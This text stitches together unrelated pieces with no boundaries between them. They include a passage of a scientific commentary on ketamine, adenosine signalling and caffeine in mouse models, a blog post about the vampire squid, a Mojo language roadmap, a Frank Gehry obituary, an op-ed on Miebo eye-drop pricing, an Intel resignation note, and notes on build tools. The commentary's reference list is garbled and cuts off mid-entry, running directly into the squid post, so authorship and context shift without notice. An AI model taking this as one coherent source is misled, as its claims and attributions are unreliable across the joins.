The dose–response relationship was clear-cut. At 5 mg/kg, ketamine produced modest signals; at 10 and 20 mg/kg, the effects were unambiguous. Higher doses prolonged the response but did not change the peak amplitude. Two-photon imaging showed that the adenosine signal was spatially diffuse. The kinetics differed from those of acute hypoxia, which the authors used as a positive control. Ketamine at the standard antidepressant dose (10 mg/kg) produced peak amplitudes of approximately 15% ΔF/F, while higher doses (20–50 mg/kg) reached approximately 35% ΔF/F, still substantially lower than the ∼60% ΔF/F observed with acute hypoxia. However, ketamine’s decay was much slower, taking more than 500 s compared with around 50 s for hypoxia. The less pronounced peak but prolonged duration suggests that ketamine causes sustained metabolic modulation rather than acute cellular stress.
This temporal resolution matters. Static measures of receptor expression or single-time-point tissue sampling would have missed a surge that switches on and off. Only continuous optical monitoring could reveal the dynamic signal on which the therapy depends.
Determining cause and effect in biology
The rigor of the mechanistic proof is exemplary. Genetic and pharmacological approaches converge on the same conclusion. Adora1−/− and Adora2a−/− mice lost all of the antidepressant efficacy of ketamine in two standard tests for depression: the forced swim test, which measures behavioral despair, and the sucrose preference test, which measures anhedonia (2). The results were not paradigm-specific; the requirement also held in the chronic restraint stress model and the lipopolysaccharide model of inflammatory depression (3, 4). Acute pharmacological blockade with the selective antagonists PSB36 (A1) and ZM241385 (A2A) likewise completely abolished the therapeutic response to ketamine, at both 1 hour and 24 hours post-treatment.
The circuit specificity is equally convincing. The authors used AAV-mediated CRISPR–Cas9 to deliver sgRNAs targeting Adora1 and Adora2a within the mPFC. Loss of the local receptors was sufficient to negate the effect of systemic ketamine (2). This confirms the mPFC as a key node, consistent with its established roles in mood and executive function, now grounded mechanistically.
The sufficiency experiments complete the logical circle. Direct infusion of adenosine into the mPFC produced antidepressant-like effects lasting 24 hours (2). More elegantly, optogenetic stimulation of astrocytes expressing cOpn5, an optogenetic tool that triggers Ca²⁺-dependent ATP release and subsequent CD73-mediated adenosine production, produced therapeutic effects, and this effect was abolished in Nt5e−/− mice lacking CD73 (2, 5). Systemic delivery of selective agonists (CHA for A1, CGS21680 for A2A) produced rapid antidepressant responses, with A1 agonism alone potent enough to sustain effects for 24 hours (2).
This mechanism was shown with a degree of thoroughness the field demands but rarely achieves.
Mitochondria, not neuronal hyperactivity
The upstream mechanism represents genuinely novel biology. Rather than generating adenosine through extracellular ATP hydrolysis, ketamine directly modulates mitochondrial function to increase intracellular adenosine, which then exits cells via equilibrative nucleoside transporters (ENT1/2). The authors demonstrate this in isolated mPFC mitochondria incubated with [¹³C₃]pyruvate. Ketamine (≥2 μM, therapeutically relevant concentrations) (6, 7) dose-dependently suppressed ¹³C enrichment of the TCA cycle intermediates fumarate, malate, and aspartate while causing accumulation of pyruvate (2).
This metabolic brake cascades into adenosine production. Using PercevalHR sensors to measure intracellular ATP/ADP ratios in vivo, they show that ketamine quickly decreases this ratio in CaMKII⁺ pyramidal neurons (largest effect), GABAergic interneurons (transient reduction with rebound), and astrocytes (sustained decrease) (2). The timing is telling: the drop in the ATP/ADP ratio precedes the extracellular adenosine surge, placing the metabolic perturbation upstream.
Critically, this occurs without neuronal hyperactivity. Calcium imaging with GCaMP8s showed that ketamine at 10 mg/kg did not increase Ca²⁺ signaling in pyramidal neurons and actually decreased the activity of GABAergic interneurons (2). This overturns the assumption that seizure-like neuronal hyperactivity is necessary for rapid antidepressant action. The mechanism is metabolic modulation driving adenosine efflux via equilibrative nucleoside transporters, not an excitotoxic process.
The authors demonstrate that dipyridamole, an ENT1/2 inhibitor, reduces the adenosine signal induced by ketamine, confirming the role of these transporters (2). In contrast, genetic depletion of CD73 (which hydrolyzes extracellular ATP to adenosine) has no effect on ketamine-induced adenosine surges.¹ The adenosine arises intracellularly and exits through ENT1/2 transporters in response to the concentration gradient produced by metabolic shifts.
From mechanism to molecules
This work goes beyond descriptive neuroscience in its immediate therapeutic translation. In the authors’ hands, adenosine dynamics serve as a functional biomarker. On that basis, they synthesized 31 ketamine derivatives, systematically varying chemical groups that affect metabolism and receptor binding (2). Screening identified deschloroketamine (DCK) and deschloro-N-ethyl-ketamine (2C-DCK) as compounds showing 40–80% stronger adenosine signals than ketamine at equivalent doses.
The behavioral effects followed. DCK produced significant antidepressant effects at 2 mg/kg (compared with 10 mg/kg for ketamine) with only slight hyperlocomotion at this dose (2), demonstrating a dissociation between therapeutic and psychotomimetic effects: DCK at therapeutic doses produced only modest locomotor activation, whereas ketamine at 10 mg/kg produced marked hyperlocomotion. The enhanced therapeutic index indicates that promoting signaling downstream of adenosine, rather than optimizing nonspecific NMDA receptor blockade, broadens the safety window.
The authors provide clear evidence for a dissociation between NMDAR antagonism and adenosine release. Compounds such as 3'-Cl-ketamine blocked NMDARs with high potency (IC₅₀ comparable to ketamine in cortical slice recordings) but did not induce adenosine surges and were ineffective as antidepressants (2). The correlation between estimated in vivo NMDAR inhibition (derived from ex vivo IC₅₀ values and brain tissue concentrations) and adenosine modulation was non-significant (Pearson r, P = 0.097).¹ NMDAR antagonism is therefore neither necessary nor sufficient; the therapeutic action operates via ketamine’s direct mitochondrial effects.
This metabolic evidence is consistent with the parent compound driving adenosine release. In contrast, ketamine’s primary metabolites, norketamine and (2R,6R)-hydroxynorketamine, do not produce adenosine responses at equivalent doses (2). Notably, hydroxynorketamine does have antidepressant properties in some studies (8). Inhibition of metabolism also matters: CYP3A4 inhibitors (ketoconazole, ritonavir) potentiated the adenosine signal, whilst CYP2B6 inhibition (ticlopidine) did not (2).
Electroconvulsive therapy and beyond
The adenosine framework extends beyond ketamine. Seizures induced by electroconvulsive therapy (ECT) in anesthetized mice (40 mA, 100 Hz, 10 s) produced an adenosine surge in the medial prefrontal cortex (mPFC) comparable in magnitude to that of ketamine but with faster kinetics (2): the onset and decay of the adenosine signal are quicker, consistent with ECT producing intense but brief neuronal firing. According to the authors, the requirement for adenosine in mediating the antidepressant effects is the same. Adora1−/− mice (lacking the adenosine A1 receptor) and Adora2a−/− mice (lacking the adenosine A2A receptor) did not respond to ECT with reduced immobility in the forced swim test or restored preference for sucrose in the sucrose preference test (2).
The researchers also found that acute intermittent hypoxia (aIH), a controlled reduction in oxygen consisting of 5 cycles of 9% O₂ for 5 min each, interspersed with 21% O₂, and applied daily for 3 days, produces antidepressant effects that were entirely reliant on adenosine signaling.¹ Most importantly from a clinical perspective, aIH is non-invasive, has been shown to be safe in other clinical contexts (9), requires no complex machinery as long as oxygen delivery can be controlled, and could be rolled out in low-resourced settings. Adenosine receptor knockout mice showed no antidepressant effects from aIH, indicating that aIH, ketamine, and ECT share the same mechanistic dependence on adenosine signaling (Figure 1) (2).
The coffee question: Clinical and mechanistic insights
It is certainly a paradox worth noticing. The most widely consumed psychoactive drug in the world is caffeine, which functions as an adenosine receptor antagonist (Figure 2). The study explicitly raises “the possibility of dietary caffeine interfering with these treatments” (2, 10, 11). The warning has mechanistic grounding: if activation of adenosine receptors is necessary for therapeutic effectiveness, and caffeine is an adenosine receptor antagonist, then coffee drinking could be expected to blunt treatment response.
Figure 2.
The coffee paradox in adenosine-mediated antidepressant action. Depression (left) and coffee consumption (right) are both linked through adenosine signaling (center), creating a pharmacological paradox: chronic coffee drinking appears protective against depression through tonic adenosine receptor modulation, while acute pre-treatment caffeine may attenuate the phasic adenosine surge required for rapid antidepressant responses to ketamine and electroconvulsive therapy.
The epidemiological literature paints a different picture. Several meta-analyses indicate that chronic coffee consumption protects against depression. One found a relative risk of 0.757 for coffee and 0.721 for caffeine (12). Another found an RR of 0.76, with the optimal protective effect at ∼400 mL/day (13). Compared with many drug treatments, whose effect sizes fall in a similar range, a risk reduction of 20 to 25% is not small; it is quite impressive.
Ideas based on known pharmacology, but not yet directly tested
The answer may lie in the distinction between tonic and phasic adenosine signaling, and in receptor reserve. Ongoing caffeine use causes a modest (∼20%) upregulation of A1 receptors, but crucially, this upregulation does not impair the receptors’ functional signaling capacity once adenosine binds (14). The receptors are still functional; there are just more of them.
Furthermore, adenosine receptors show a significant “spare receptor” reserve, estimated at 70–90% for A2A receptors and 10–64% for A1 receptors. This means that occupancy of only 5–10% of receptors can produce approximately 50% of the maximal effect (15, 16). Where spare receptors are present, an antagonist must occupy more than 95% of receptors to abolish the response (15).
The pharmacokinetics of caffeine is relevant here. Caffeine has a half-life of 3–7 hours and a peak concentration 45–60 minutes after ingestion, with a receptor occupancy of ∼50–65% between doses in regular consumers (11, 17).
With chronic consumption, the effect is largely tonic: receptors are upregulated and the spare receptor reserve is maintained. Receptor occupancy is partial, never complete. Baseline adenosinergic tone may even be augmented in the presence of the antagonist, consistent with the epidemiological protection against depression.
The adenosine surge following ketamine or ECT, by contrast, must overcome phasic blockade from recently consumed caffeine. With 50–65% of receptors occupied by caffeine, considerable receptor reserve remains, but the surge has to work harder: the signal is attenuated, not abolished.
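One way to make this concrete is the standard relation for agonist receptor occupancy in the presence of a competitive antagonist; the plug-in numbers below are purely illustrative assumptions, not measured values for adenosine and caffeine:

occupancy_A = ([A]/K_A) / (1 + [A]/K_A + [B]/K_B)

If caffeine (B) alone occupies roughly 60% of receptors, then [B]/K_B ≈ 1.5. Reaching the ∼10% agonist occupancy that spare receptors translate into a near-half-maximal response then requires [A]/K_A ≈ 0.28, versus ≈ 0.11 with no caffeine on board, i.e., a roughly 2.5-fold larger adenosine signal. On this arithmetic the surge is blunted but, if large enough, not abolished.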
This pharmacological analysis suggests tailored approaches rather than outright bans.
Regular caffeine/coffee use pre-ketamine is probably not contraindicated. Epidemiological data suggest a possible benefit of that use.
Having coffee just before treatment is more concerning. Patients may be advised to undergo a caffeine washout to ensure optimal adenosine receptor availability during the critical adenosine surge.
Drinking coffee after treatment is probably safe once the first plasticity mechanisms are already established.
Can we test whether regular coffee drinkers show blunted ketamine responses? Does controlled caffeine washout enhance outcomes? Is there a link between caffeine use and the response? The current paper offers the mechanistic foundation to pose such questions rigorously.
These remain open empirical questions. The quantitative pharmacology linking chronic receptor modulation, acute receptor reserve, and the surge amplitude needed to overcome partial blockade has not yet been done for this system. Yue et al. clarify the mechanism so that scientists can ask the right questions.
What remains unknown
What makes this piece valuable is its honesty about the boundaries of its work. Several questions merit attention.
First, the mechanisms linking acute adenosine surges to sustained plasticity are not well defined. The authors demonstrate that the upregulation of BDNF [a key transducer of antidepressant effects (18)] produced by ketamine requires the A1 and A2A receptors (2), linking adenosine to established pathways of neuroplasticity. Still, how an adenosine surge lasting ∼30 minutes produces antidepressant effects extending over days to weeks needs further elaboration. HOMER1A activation and stimulation of the mTOR pathway are cited in the paper as likely downstream effectors (2, 19, 20), but the full signalling pathway has yet to be defined.
Second, the hippocampal story is incomplete. After ketamine, adenosine rose in the hippocampus to a degree comparable to the mPFC (2), yet optogenetic induction of adenosine and direct infusion of adenosine into the dorsal hippocampus did not produce an antidepressant effect (2). This suggests functional heterogeneity, possibly along the dorsal–ventral axis, with the ventral hippocampus more closely tied to mood circuits and the dorsal hippocampus serving cognitive and spatial functions. The authors rightly highlight the need to investigate this further.
Third, we will need to situate adenosine relative to the other proposed ketamine mechanisms. Interest in this area has centered on NMDAR antagonism (21), AMPA receptor potentiation (22), mTOR activation (23) and various metabolite effects (8). The current work shows that adenosine is necessary and sufficient and that NMDAR blockade dissociates from therapeutic action across derivatives. Although the position of adenosine in the signaling cascade remains unclear, whether it operates in parallel with, upstream of, or downstream from other mechanisms, the authors’ data suggest that adenosine may be the primary initiating signal and the other mechanisms downstream consequences; this has yet to be validated.
To apply this finding to treatment-resistant depression in humans, we have to keep in mind the heterogeneity that clinical psychiatry knows so well. Some patients do not respond to ketamine, and not all respond to ECT. Do nonresponders have defects in adenosine production, receptor expression, or receptor coupling? Can adenosine dynamics, assessed with PET tracers for A1 and A2A receptors and, if predictive, with peripheral biomarkers, identify patients likely to respond? These questions ultimately determine clinical utility.
A framework for rational development
Unfortunately, psychiatry has long depended more on serendipity than on mechanism. The monoamine hypothesis grew out of accidental discoveries (iproniazid, imipramine). The atypical antipsychotics resulted from chemical modifications aimed at fewer side effects. And ketamine’s antidepressant properties were themselves a chance finding. We have been, in Baudrillard’s terms, cartographers mapping territories we have not yet crossed: “The territory no longer precedes the map, nor survives it. Henceforth, it is the map that precedes the territory” (24). We say we know what works without knowing why.
In contrast, Yue et al. provide an extraordinary map after exquisitely surveying the territory. With adenosine as the mechanistic target, the authors have already demonstrated proof of principle: derivatives with enhanced adenosine signaling show improved therapeutic indices.¹ The path forward involves:
Medicinal chemistry optimization of adenosine-enhancing compounds, prioritizing metabolic mitochondrial modulators over NMDAR antagonists.
Allosteric modulation of A1 and A2A receptors to enhance endogenous signaling without tonic activation.
Non-pharmacological interventions (aIH, potentially others) that leverage adenosine biology.
Biomarker development for patient stratification and response prediction.
Combination strategies targeting complementary nodes in the adenosine-plasticity cascade.
The technical platform is robust: genetically encoded sensors provide real-time functional readouts for compound screening; the behavioral assays are well-validated; the genetic models allow mechanistic dissection; the therapeutic endpoints (onset, duration, side effects) are clinically meaningful.
Most critical is that the work establishes that rapid antidepressant action is not a pharmacological curiosity of a dissociative anesthetic. A reproducible neurobiological phenomenon, adenosine-driven plasticity in mood-regulatory circuits, can be triggered by multiple routes. This converts an empirical observation (ketamine works fast) into a biological principle (adenosine surges trigger antidepressant plasticity) that guides rational therapeutic development (Table 1).
Table 1. Clinical Implications of Adenosine-Based Antidepressant Mechanisms
As we have previously written about psychotherapeutics, only time will tell how far our conceptions of causation are from physical reality. Yue et al. have greatly shortened that distance. What they provide is less a single finding than a platform: genetically encoded sensors, validated targets, proof-of-principle molecules, non-drug alternatives, and a general model that explains disparate interventions.
The adenosine hypothesis can be tested with readily available tools and carries immediate therapeutic implications. Yue et al. have given the field the aerial view after decades of wandering through the forest of empirical psychopharmacology without looking beyond the next tree.
Perhaps the most intriguing implication of this work lies in an unexpected connection: the most rigorous mechanistic dissection of rapid antidepressant action identifies adenosine as the critical mediator, yet adenosine receptors are the primary target of caffeine, the world's most widely consumed psychoactive substance. Is this merely coincidence, or does it reveal something fundamental about why humans have gravitated toward caffeine consumption across cultures and millennia? The epidemiological protection that chronic coffee drinking confers against depression may represent an inadvertent form of adenosinergic modulation operating at population scale. Yet the same mechanism that provides tonic benefit might interfere with phasic therapeutic surges during acute treatment.
The coffee paradox demands resolution through carefully designed clinical studies. Do regular coffee drinkers show altered responses to ketamine or electroconvulsive therapy? Does pre-treatment caffeine washout enhance therapeutic outcomes? Can we develop dosing strategies that preserve the protective effects of chronic consumption while optimizing acute treatment responses? The convergence of the world's most prevalent psychoactive drug with the mechanistic lynchpin of our most effective rapid antidepressants is unlikely to be accidental. Understanding this intersection may illuminate both the widespread appeal of caffeine and the optimization of adenosine-targeted therapeutics. The next generation of clinical trials should systematically examine caffeine consumption patterns as a critical variable in treatment response, transforming an apparent pharmacological complication into a therapeutic opportunity.
Author contributions
Both authors contributed equally and fully to this article.
Funding sources
The authors are supported by funding from the NIH/National Institute of Mental Health (R0MH127423).
Author disclosures
The authors declare no conflicts of interest.
References
1. Bernard C. An introduction to the study of experimental medicine.
The physiological effects of caffeine on synaptic transmission and plasticity in the mouse hippocampus selectively depend on adenosine A1 and A2A receptors. Biochem Pharmacol. 2019;166:313–21. DOI: 10.1016/j.bcp.2019.06.008. PMID: 31199895.
Coffee, tea, caffeine and risk of depression: A systematic review and dose-response meta-analysis of observational studies. Mol Nutr Food Res. 2016;60(
The vampire squid (Vampyroteuthis infernalis) has the largest cephalopod genome ever sequenced: more than 11 billion base pairs. That’s more than twice as large as the biggest squid genomes.
It’s technically not a squid: “The vampire squid is a fascinating twig tenaciously hanging onto the cephalopod family tree. It’s neither a squid nor an octopus (nor a vampire), but rather the last, lone remnant of an ancient lineage whose other members have long since vanished.”
As usual, you can also use this squid post to talk about the security stories in the news that I haven’t covered.
Our vision for Mojo is to be the one programming language developers need to target diverse hardware—CPUs, GPUs, and other accelerators—using Python's intuitive syntax combined with modern systems programming capabilities.
While we want Mojo to achieve its full roadmap potential over time, we also want to bring an epoch of stability to the Mojo development experience, and thus a 1.0 version. As such, Mojo will reach 1.0 once we complete the goals we’ve listed for Phase 1 in our roadmap, providing stability for developers seeking a high-performance CPU and GPU programming language.
Work is well underway for the remaining features and quality work we need to complete for this phase, and we feel confident that Mojo will get to 1.0 sometime in 2026. This will also allow us to open source the Mojo compiler as promised.
While we are excited about this milestone, this of course won’t be the end of Mojo development! Some commonly requested capabilities for more general systems programming won’t be completed for 1.0, such as a robust async programming model and support for private members. Read below for more information on that!
Why a 1.0 now?
A 1.0 version for Mojo makes sense now for several reasons: first, we’d like to establish an epoch of stability within the Mojo ecosystem. A vibrant and growing community has formed around Mojo, and more people are looking to build larger projects using it. To date, the rapid pace of change in Mojo and its libraries has been a challenge.
We want to make it much easier to maintain a Mojo project by giving developers the confidence that what they write today won’t break tomorrow. The introduction of semantic versioning, markers for stable and unstable interfaces, and an overall intentionality in language changes will provide an even more solid foundation for someone developing against Mojo 1.x.
Mojo packages that use stabilized APIs should keep building across the 1.x series, even as we continue to add in new features that don’t make 1.0 itself. This will let the growing number of community Mojo libraries interoperate, unlocking increasingly complex Mojo projects.
We’re excited to have more Mojicians come to the platform. Announcing a 1.0 for the language will be a sign to the rest of the world to come and try out Mojo, or to come back and see how it has grown since the last time they kicked the tires. That’s why it’s important to us to have an excellent documentation and tooling experience for new and returning developers.
Planning for Mojo 1.0 has also been hugely valuable to the Modular team, as it provides a forcing function for focus and prioritization. There’s so much that can be worked on when developing a language that it’s helpful to identify what we weren’t going to be able to do before 1.0. That lets us direct effort to making a more solid experience for what Mojo is great at today, and polish an initial set of features before adding more.
Regarding the Mojo standard library, we’ve planned to give sufficient time to run each new language feature through it. This lets us identify bugs or areas of improvement before we call a feature “done”. We also expect 1.0 to have relatively few library features “stabilized” and expand that scope over time incrementally.
What’s next after 1.0?
Mojo 1.0 will be a milestone to celebrate, but it is only a step in a much longer journey. There are many features that won’t quite make the 1.0 launch, some of which we plan to roll out incrementally in 1.x releases. Many of these features (e.g. a “match” statement and enums) will be backward compatible and won’t break existing code, so we can add them into 1.x releases.
That said, we know that Mojo 1.0 won’t be perfect! There are some important language features in Phase 2 of the Mojo language roadmap that will introduce breaking changes to the language and standard library. For example, the ability to mark fields “private” is essential to providing memory safety.
During the development of Mojo 1.x, we will announce plans for a source-breaking Mojo 2.0, and will build support for it under an “experimental” flag to allow opt-in use of this language mode. This means the Mojo compiler will support both 1.x and 2.0 packages, and we aim to make them link compatible, just like C++20 is source incompatible with C++98 but developers can build hybrid ecosystems. We will then enable package-by-package migration from 1.x to 2.x over time as 2.0 converges and ships.
Right now we are laser-focused on getting 1.0 out the door, but we have great confidence we’ll be able to navigate this future transition smoothly. Mojo has learned a lot of great things from Python, as well as from the things that didn’t go as well: we’ll do what we can to avoid a transition like Python 2 to 3!
Join the community and follow along!
Our work towards Mojo 1.0 will be done in the open, and we welcome feedback and pull requests that help make the language even better. There are some great ways to participate:
Check out the new language and library additions as they roll out on a nightly basis in our open-source modular repository.
Have detailed discussions about language and interface design in the Modular forum.
Frank Gehry, one of the most influential architects of the last century, has died aged 96.
Gehry was acclaimed for his avant garde, experimental style of architecture. His titanium-covered design of the Guggenheim Museum in Bilbao, Spain, catapulted him to fame in 1997.
He built his daring reputation years before that when he redesigned his own home in Santa Monica, California, using materials like chain-link fencing, plywood and corrugated steel.
His death was confirmed by his chief of staff Meaghan Lloyd. He is survived by two daughters from his first marriage, Leslie and Brina; his wife, Berta Isabel Aguilera; and their two sons, Alejandro and Samuel.
Born in Toronto in 1929, Gehry moved to Los Angeles as a teenager to study architecture at the University of Southern California before completing further study at the Harvard Graduate School of Design in 1956 and 1957.
After starting his own firm, he broke from the traditional architectural principles of symmetry, using unconventional geometric shapes and unfinished materials in a style now known as deconstructivism.
"I was rebelling against everything," Gehry said in an interview with The New York Times in 2012.
His work in Bilbao put him in high demand, and he went on to design iconic structures in cities all over the world: the Jay Pritzker Pavilion in Chicago's Millennium Park, the Gehry Tower in Germany, and the Louis Vuitton Foundation in Paris.
"He bestowed upon Paris and upon France his greatest masterpiece," said Bernard Arnault, the CEO of LVMH, the worlds largest luxury goods company which owns Louis Vuitton.
With a largely unpredictable style, no two of his works look the same. Prague's Dancing House, finished in 1996, looks like a glass building folding in on itself; his Hotel Marques in Spain, built in 2006, features thin sheets of wavy, multicoloured metal; his design for a business school in Sydney looks like a brown paper bag.
Gehry won the coveted Pritzker Architecture Prize for lifetime achievement in 1989, when he was 60, with his work described as having a "highly refined, sophisticated and adventurous aesthetic".
"His designs, if compared to American music, could best be likened to Jazz, replete with improvisation and a lively unpredictable spirit," ther Pritzker jury said at the time.
Gehry was awarded the Order of Canada in 2002 and the Presidential Medal of Freedom, the highest civilian honour in the US, in 2016.
A $20 drug in Europe requires a prescription and $800 in the U.S.
A month’s supply of Miebo, Bausch & Lomb’s prescription dry eye drug, costs $800 or more in the U.S. before insurance. But the same drug — sold as EvoTears — has been available over-the-counter (OTC) in Europe since 2015 for about $20. I ordered it online from an overseas pharmacy for $32 including shipping, and it was delivered in a week.
This is, of course, both shocking and unsurprising. A 2021 RAND study found U.S. prescription drug prices are, on average, more than 2.5 times higher than in 32 other developed nations. Miebo exemplifies how some pharmaceutical companies exploit regulatory loopholes and patent protections, prioritizing profits over patients, eroding trust in health care. But there is a way to fix this loophole.
In December 2019, Bausch & Lomb, formerly a division of Valeant, acquired the exclusive license to commercialize and develop NOV03, now called Miebo, in the United States and Canada. Rather than seeking approval as an OTC drug, as it is in Europe, Bausch secured U.S. Food and Drug Administration approval for it as a prescription medication, subsequently pricing it at a premium. Currently, according to GoodRx, a monthly supply of Miebo costs $830.27 at Walgreens and is listed at $818.38 on Amazon Pharmacy.
The strategy has paid off: Miebo’s 2024 sales — its first full year — hit $172 million, surpassing the company’s projections of $95 million. The company now forecasts sales to exceed $500 million annually. At European prices, those sales would be less than $20 million. Emboldened by Miebo’s early success, Bausch & Lomb raised the price another 4% in 2025, according to the drug price tracking firm 46brooklyn.
Bausch & Lomb has a track record of prioritizing profits over patients. As Valeant, its business model was simple: buy, gut, gouge, repeat. In 2015, it raised prices for Nitropress and Isuprel by over
200% and 500%
, respectively, triggering a 2016 congressional hearing. Despite promises of reform, little has changed. When he was at Allergan, Bausch & Lomb’s current CEO, Brent Saunders, pledged “
responsible pricing
” but tried to extend patent protection for Allergan’s drug Restasis (another dry eye drug) through a
dubious deal with the Mohawk Indian tribe
, later rejected by courts.
Now at Bausch & Lomb, Saunders oversaw Miebo’s launch, claiming earlier this year in an investor call, “We are once again an innovation company.” But finding a way to get an existing European OTC drug to be a prescription drug in the U.S. with a new name and a 40-fold price increase is not true innovation — it’s a price-gouging strategy.
Bausch & Lomb could have pursued OTC approval in the U.S., leveraging its expertise in OTC eye drops and lotions. However, I could not find in transcripts or presentations any evidence that Baush & Lomb seriously pursued this. Prescription status, however, ensures much higher prices, protected by patents and limited competition. Even insured patients feel the ripple effects: Coupons may reduce out-of-pocket costs, but insurers pay hundreds per prescription, driving up premiums and the overall cost of health care for everyone.
In response to questions from STAT about why Miebo is an expensive prescription drug, a representative said in a statement, “The FDA determined that MIEBO acts at the cellular and molecular level of the eye, which meant it had to go through the same rigorous process as any new pharmaceutical — a full New Drug Application. Unlike in Europe, where all medical device eye drops are prescription-free and cleared through a highly predictable and fast pathway, we were required to design, enroll and complete extensive clinical trials involving thousands of patients, and provide detailed safety and efficacy data submissions. Those studies took years and significant investment, but they ensure that MIEBO meets the highest regulatory standards for safety and effectiveness.”
Bausch & Lomb’s carefully worded response expertly sidesteps the real issue. The FDA’s test for OTC status isn’t a drug’s mechanism of action — it’s whether patients can use it safely without a doctor. Miebo’s track record as an OTC product in Europe for nearly a decade shows it meets that standard. Bausch & Lomb provides no evidence, or even assertion, that it ever tried for OTC approval in the U.S. Instead, it pursued the prescription route — not because of regulatory necessity, but as a business strategy to secure patents and command an $800 price. In doing so, B&L is weaponizing a regulatory loophole against American patients, prioritizing profit over access, and leaving their “significant investment” as the cost of monopoly, not medical necessity.
Even if you accept Bausch & Lomb’s self-serving rationale, the answer is not to allow the loophole to persist, but to close it. The FDA could require any drug approved as OTC internationally be considered for OTC status in the United States before greenlighting it as a prescription product — and mandate retroactive review of cases like Miebo.
The FDA’s OTC monograph process, which assesses the safety and efficacy of nonprescription drugs, makes this feasible, though it may need to be adjusted slightly. Those changes might involve incorporating a mechanism to make sure that overseas OTC status triggers a review of U.S. prescription drugs containing the same active ingredients or formulations for potential OTC designation; developing criteria to assess equivalency in safety and efficacy standards between U.S. OTC requirements and those of other countries; and establishing a retroactive review pathway within the monograph process to handle existing prescription drugs already marketed OTC internationally.
EvoTears thrives abroad without safety concerns, countering industry claims of stricter U.S. standards. This reform would deter companies from repackaging OTC drugs as high-cost prescriptions, fostering competition and lowering prices.
While this tactic isn’t widespread, it joins loopholes like late-listed patents, picket fence patents, or pay-for-delay generic deals that undermine trust in an industry whose employees largely aim to save lives.
Miebo also shows how global reference pricing could save billions. Aligning with European prices could cut consumer costs while reducing doctor visits, pharmacy time, and administrative burdens. For patients who skip doses to afford groceries, lower prices would mean better access and health. Reforms like the 2022 Inflation Reduction Act’s Medicare price negotiations set a precedent, but targeted rules are urgently needed.
Unexplained differences in drug prices between the U.S. and other wealthy countries erode the public’s trust in health care. Companies like Bausch & Lomb exploit systemic gaps, leaving patients and payers to foot exorbitant bills. An OTC evaluation rule, with retroactive reviews, is a practical first step, signaling that patient access takes precedence over corporate greed.
Let’s end the price-gouging practices of outliers and build a health care system that puts patients first. Just as targeting criminal outliers fosters a law-abiding society, holding bad pharmaceutical actors accountable is crucial for restoring trust and integrity to our health care system. While broader approaches to making health care more fair, accessible, and affordable are needed, sometimes the way to save billions is to start by saving hundreds of millions.
David Maris is a six-time No. 1 ranked pharmaceutical analyst with more than two decades covering the industry. He currently runs Phalanx Investment Partners, a family office; is a partner in Wall Street Beats; and is co-author of the recently published book “The Fax Club Experiment.” He is currently working on his next book about health care in America.
I've resigned from Intel and accepted a new opportunity. If you are an Intel employee, you might have seen my fairly long email that summarized what I did in my 3.5 years. Much of this is public:
It's still early days for AI flame graphs. Right now when I browse CPU performance case studies on the Internet, I'll often see a CPU flame graph as part of the analysis. We're a long way from that kind of adoption for GPUs (and it doesn't help that our open source version is Intel only), but I think as GPU code becomes more complex, with more layers, the need for AI flame graphs will keep increasing.
I also supported cloud computing, participating in 110 customer meetings, and created a company-wide strategy to win back the cloud with 33 specific recommendations, in collaboration with others across 6 organizations. It is some of my best work and features a visual map of interactions between all 19 relevant teams, described by Intel long-timers as the first time they have ever seen such a cross-company map. (This strategy, summarized in a slide deck, is internal only.)
I always wish I did more, in any job, but I'm glad to have contributed this much especially given the context: I overlapped with Intel's toughest 3 years in history, and I had a hiring freeze for my first 15 months.
My fond memories from Intel include meeting Linus at an Intel event, where he said "everyone is using fleme graphs these days" (Finnish accent); meeting Pat Gelsinger, who knew about my work and introduced me to everyone at an exec all hands; surfing lessons at an Intel Australia and HP offsite (mp4); and meeting Harshad Sane (Intel cloud support engineer), who helped me when I was at Netflix and now has joined Netflix himself -- we've swapped ends of the meeting table. I also enjoyed meeting Intel's hardware fellows and senior fellows, who were happy to help me understand processor internals. (Unrelated to Intel, but if you're a Who fan like me, I recently met some other people as well!)
My next few years at Intel would have focused on execution of those 33 recommendations, which Intel can continue to do in my absence. Most of my recommendations aren't easy, however, and require accepting change, ELT/CEO approval, and multiple quarters of investment. I won't be there to push them, but other employees can (my CloudTeams strategy is in the inbox of various ELT, and in a shared folder with all my presentations, code, and weekly status reports). This work will hopefully live on and keep making Intel stronger. Good luck.
Assemblies: A Path to Co-Governance and Democratic Renewal
OrganizingUp
convergencemag.com
2025-12-05 20:24:21
Democracy should give us a real say in the decisions that shape our lives, but few people today feel the government is working for them. Inequality is extreme, our economic lives are precarious, and trust in government and all kinds of institutions is at historic lows. All this has opened up space f...
The market fit is interesting. Git has clearly won, it has all of the mindshare, but since you can use jj to work on Git repositories, it can be adopted incrementally. This is, in my opinion, the only viable way to introduce a new VCS: it has to be able to be partially adopted.
If you've worked with other determinism-based systems, one thing they have in common is they feel really fragile, and you have to be careful that you don't do something that breaks the determinism. But in our case, since we've created every level of the stack to support this, we can offload the determinism to the development environment and you can basically write whatever code you want without having to worry about whether it's going to break something.
Configuring the build based on the host environment and build targets. I am not aware of any common name for this, other than maybe configure script (but there exist many tools for this that are not just shell scripts). Common examples are CMake, Meson, autotools, and the Cargo CLI interface (e.g. --features and --target).
Executing a bunch of processes and reporting on their progress. The tool that does this is called a build executor. Common examples are make, ninja, docker build, and the Compiling phase of cargo build.
There are a lot more things an executor can do than just spawning processes and showing a progress report!
This post explores what those are and sketches a design for a tool that could improve on current executors.
change detection
Ninja depends on mtimes, which have many issues. Ideally, it would take notes from redo and look at file attributes, not just the mtime, which eliminates many more false positives.
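To make the redo-style idea concrete, here is a minimal Python sketch (my own illustration, not ronin's code; the signature fields are my choice) that records a stat signature and treats a file as changed if any attribute differs, rather than trusting the mtime alone:

```python
# Sketch: redo-style change detection using a multi-field stat signature.
import os
from typing import NamedTuple, Optional

class StatSig(NamedTuple):
    mtime_ns: int
    size: int
    inode: int
    mode: int

def stat_sig(path: str) -> StatSig:
    st = os.stat(path)
    return StatSig(st.st_mtime_ns, st.st_size, st.st_ino, st.st_mode)

def is_dirty(path: str, recorded: Optional[StatSig]) -> bool:
    # A file counts as changed if any attribute differs, not just the mtime.
    if recorded is None:
        return True
    return stat_sig(path) != recorded
```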
querying
I wrote earlier about querying the build graph.
There are two kinds of things you can query: the configuration graph (what bazel calls the target graph), which shows dependencies between “human meaningful” packages; and the action graph, which shows dependencies between files.
